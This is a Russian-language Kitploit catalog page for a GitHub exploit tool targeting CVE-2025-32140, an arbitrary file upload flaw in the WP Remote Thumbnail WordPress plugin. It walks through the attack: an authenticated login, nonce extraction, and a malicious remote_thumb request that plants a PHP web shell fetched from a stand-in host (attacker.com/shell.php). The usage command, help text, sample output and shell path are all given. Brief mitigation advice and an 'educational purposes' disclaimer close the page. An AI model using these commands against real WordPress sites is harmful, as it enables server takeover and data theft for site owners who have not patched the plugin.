Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32140 — Плагин WP Remote Thumbnail для WordPress версии <= 1.3.2 уязвим для произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-32140
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-32140

CVE-2025-32140

Плагин WP Remote Thumbnail для WordPress версии <= 1.3.2 уязвим для произвольной загрузки файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-32140 – Эксплойт для WP Remote Thumbnail (произвольная загрузка файлов)


📝 Описание

CVE-2025-32140 — это критическая уязвимость в плагине WP Remote Thumbnail для WordPress. Она позволяет аутентифицированным атакующим (с правами автора или выше) загружать произвольные файлы, такие как веб-шеллы, используя ошибочную функцию, принимающую непроверенные URL.

Плагин не проверяет тип файла или содержимое, получаемое по предоставленному URL remote_thumb. Это позволяет атакующим сохранять вредоносные PHP-файлы (например, бэкдоры) в директорию /wp-content/uploads.


⚠️ Уязвимый компонент

  • Плагин: WP Remote Thumbnail
  • Уязвимые версии: <= 1.3.2
  • Патч: ещё не выпущен
  • Вектор атаки: Сеть
  • Требуемые привилегии: Низкие (аутентифицированный пользователь с возможностью edit_post)
  • Оценка CVSS: 9.9 (Critical)

  • 🛠 Скрипт эксплойта

    Этот скрипт на Python автоматизирует эксплуатацию CVE-2025-32140, выполняя следующие шаги:

    1. Вход на целевой сайт WordPress.
    2. Автоматическое извлечение необходимых nonce.
    3. Формирование и отправка вредоносного запроса через параметр remote_thumb.
    4. Загрузка веб-шелла на целевой сайт.

    🔧 Параметры командной строки

    ПараметрАлиасОписание
    --url-uURL целевого сайта WordPress (например, http://target.com/wordpress)
    --username-unИмя пользователя WordPress с правами на редактирование записей
    --password-pПароль для указанного пользователя
    --user_ID-uidID пользователя WordPress (обычно 1 для администратора)
    --post_ID-pidID редактируемой записи (может быть черновиком)
    --shellПрямой URL к PHP-шеллу, размещённому на сервере атакующего

    🚀 Использование

    root@kitploit:~
    python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
    

    📖 Использование и справка

    root@kitploit:~
    
                                                                                                                    
    usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
    
    Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
      --username, -un USERNAME
                            Username
      --password, -p PASSWORD
                            Password
      --user_ID, -uid USER_ID
                            User ID (usually 1 for admin)
      --post_ID, -pid POST_ID
                            Target post ID
      --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
    
    

    📋 Пример вывода

    root@kitploit:~
    [+] Logged in successfully.
    [+] Cookies set successfully.
    [DEBUG] Extracted _wpnonce: b4ef78e77d
    [DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
    [DEBUG] Extracted closedpostboxesnonce: 52be514040
    [DEBUG] Extracted samplepermalinknonce: 7b213c6597
    [DEBUG] Extracted wprthumb_nonce: 45803ee312
    [DEBUG] Extracted X-WP-Nonce: None
    [+] Exploit POST sent successfully. Check your uploads directory.
    By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
    
    

    📂 Расположение шелла

    После эксплуатации загруженный веб-шелл, скорее всего, будет находиться по адресу:

    root@kitploit:~
    http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
    

    Замените YYYY/MM на текущий год и месяц загрузки.


    🛡 Рекомендации

    Чтобы снизить риск эксплуатации этой уязвимости:

    1. Обновите плагин до последней версии (как только появится патч).
    2. Ограничьте возможность загрузки файлов только доверенными пользователями.
    3. Отключите функцию удалённого извлечения миниатюр, если она не требуется.

    ⚠️ Отказ от ответственности

    Этот скрипт предоставлен только в образовательных целях.
    Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим эксплойтом.


    👤 Автор

    Автор: Nxploited ( Khaled Alenazi ) 🌟

    Скачать инструмент